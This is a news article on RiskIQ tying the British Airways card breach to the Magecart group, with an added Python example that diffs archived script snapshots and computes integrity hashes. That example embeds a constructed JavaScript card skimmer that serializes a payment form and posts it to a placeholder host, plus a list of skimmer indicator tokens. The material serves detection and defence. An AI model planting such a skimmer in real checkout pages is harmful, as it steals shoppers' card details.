British Airways breach caused by the same group that hit Ticketmaster

Security researchers find clues connecting the Magecart group to the breach at British Airways.
Written by Catalin Cimpanu, Contributor

A cyber-criminal operation known as Magecart is believed to be behind the card breach that British Airways announced last week.

The operation has been active since 2015, and RiskIQ and ClearSky researchers were the first to document its skimming malware.

The group's usual mode of operation is to compromise online stores and plant JavaScript that harvests whatever shoppers type into checkout forms: card numbers, names, billing addresses, and any other field the payment form collects.

The group has been very active over the past three years and is blamed for injecting card-skimming scripts into thousands of sites; the most recent batch of compromised sites was discovered two weeks ago.

Its most notorious hack was the compromise of a third-party chat provider, whose infrastructure the group then used to drop malicious scripts on the Ticketmaster checkout page.

But in a report published today, RiskIQ researchers say they found clues linking the same Magecart operation to the British Airways breach.

The breach was announced last week, when British Airways said an unidentified attacker had compromised its systems and stolen the card details of some 380,000 customers.

The UK airline gave no in-depth technical details, saying only that the attacker had collected data on payments made through its main website, ba.com, and through its mobile app between 22:58 GMT on August 21, 2018, and 21:45 GMT on September 5, 2018.

RiskIQ says the time window in that official statement became the essential clue for its investigation.

The researchers turned to an internal tool that archives the source code of websites over time and used it to see how the JavaScript loaded by the British Airways site changed around the time of the hack.

They found that a file that had not been modified since 2012 was changed on August 21, 2018, at 20:49 GMT, roughly two hours before the start of the window British Airways gave in its statement.

RiskIQ says the Magecart group appended a malicious snippet to the end of a previously clean file named modernizr-2.6.2.js.

The snippet listened for mouseup and touchend events (the mouse-release and touch-release that complete a click or tap), serialized everything entered in the checkout page's payment form, and sent it to a remote server hosted in Romania (on infrastructure actually owned by a Lithuanian virtual private server [VPS] provider).
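The investigation technique described above (archive a site's scripts over time and diff the snapshots) and the appended-skimmer pattern can be illustrated with a small Python script. This is an added example, not RiskIQ's tooling and not code from the article: the two script bodies are constructed stand-ins for a clean and a tampered modernizr-2.6.2.js, the element IDs and the exfiltration hostname are placeholders, and the SRI hash shows the integrity attribute a page could pin so a browser would refuse a modified copy of the file.

```python
"""Detect an appended skimmer in an archived script and derive an SRI hash.

Added example: the two script bodies below are constructed stand-ins for a
clean and a tampered modernizr-2.6.2.js. The element IDs and the hostname are
placeholders, not values from the real incident.
"""
import base64
import difflib
import hashlib

# Constructed stand-in for the clean library as archived before the change.
CLEAN_JS = """/* Modernizr 2.6.2 (Custom Build) | MIT & BSD */
window.Modernizr = (function (window, document, undefined) {
  var Modernizr = {};
  Modernizr.touch = 'ontouchstart' in window;
  return Modernizr;
})(this, this.document);
"""

# Constructed stand-in for the later snapshot: the same library with a
# skimmer-style tail appended. It binds mouseup/touchend on a (hypothetical)
# submit button, serializes the payment form and POSTs it to a placeholder host.
TAMPERED_JS = CLEAN_JS + """
window.onload = function () {
  jQuery("#submitButton").bind("mouseup touchend", function () {
    var n = {};
    jQuery("#paymentForm").serializeArray().map(function (i) { n[i.name] = i.value; });
    jQuery.ajax({type: "POST", url: "https://exfil.example/api", data: JSON.stringify(n),
                 dataType: "application/json", async: true});
  });
};
"""

# Tokens that rarely belong in a feature-detection library but are the
# building blocks of a form skimmer.
SUSPICIOUS = ("mouseup", "touchend", "serializeArray", "ajax", "XMLHttpRequest",
              "fetch(", "sendBeacon", "btoa(")


def sri_hash(source: str, algo: str = "sha384") -> str:
    """Return the Subresource Integrity token ('sha384-<base64>') for a script body."""
    digest = hashlib.new(algo, source.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def diff_snapshots(old: str, new: str) -> dict:
    """Compare two archived copies of a script.

    Reports whether the hash changed, which lines were added or removed, and
    whether every addition sits after the last line of the old file, i.e. the
    'appended to the end of a clean file' pattern described in the article.
    """
    old_lines, new_lines = old.splitlines(), new.splitlines()
    added, removed = [], []
    appended_only = True
    matcher = difflib.SequenceMatcher(a=old_lines, b=new_lines, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "equal":
            continue
        if tag in ("replace", "delete"):
            removed.extend(old_lines[i1:i2])
        if tag in ("replace", "insert"):
            added.extend(new_lines[j1:j2])
            if i1 != len(old_lines):  # insertion somewhere before the old EOF
                appended_only = False
    return {
        "changed": sri_hash(old) != sri_hash(new),
        "added": added,
        "removed": removed,
        "appended_only": bool(added) and not removed and appended_only,
    }


def skimmer_indicators(lines) -> list:
    """Return the suspicious tokens that appear in the given (added) lines, sorted."""
    return sorted({tok for line in lines for tok in SUSPICIOUS if tok in line})


if __name__ == "__main__":
    report = diff_snapshots(CLEAN_JS, TAMPERED_JS)
    print("changed:", report["changed"], "appended only:", report["appended_only"])
    print("indicators in added code:", skimmer_indicators(report["added"]))
    # Pinning the known-good hash in the page makes a browser refuse a modified file:
    # <script src="modernizr-2.6.2.js" integrity="sha384-..." crossorigin="anonymous">
    print("integrity attribute for the clean copy:", sri_hash(CLEAN_JS))
```

Two caveats for anyone reusing the idea. Snapshot diffing only catches what the archive saw, so the crawl cadence bounds how early a change is noticed; RiskIQ's tool dated the change to the minute because it happened to hold copies from before and after. And an integrity attribute protects only as long as the attacker cannot also edit the HTML that carries it; the article reports that only the library file was modified, which is exactly the case where the check would have fired.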

The server also used a Comodo TLS certificate issued on August 15, days before the skimming began. RiskIQ reads this as a sign that the attackers prepared the operation days in advance, and that they most likely already had access to British Airways' web infrastructure by that time.

RiskIQ also says it solved the puzzle of why the main British Airways website and the mobile app were compromised at the same time.

Card-skimming scripts usually affect only websites, because mobile apps are built from a separate codebase. But according to RiskIQ, British Airways' developers chose to load the website's payment page inside the mobile app, so the app pulled in the same malicious script and payments made through it were skimmed as well.

With the Magecart operation growing each year, paying for goods online is becoming riskier even on large platforms run by companies that can, at least in theory, afford to secure their websites against compromise.
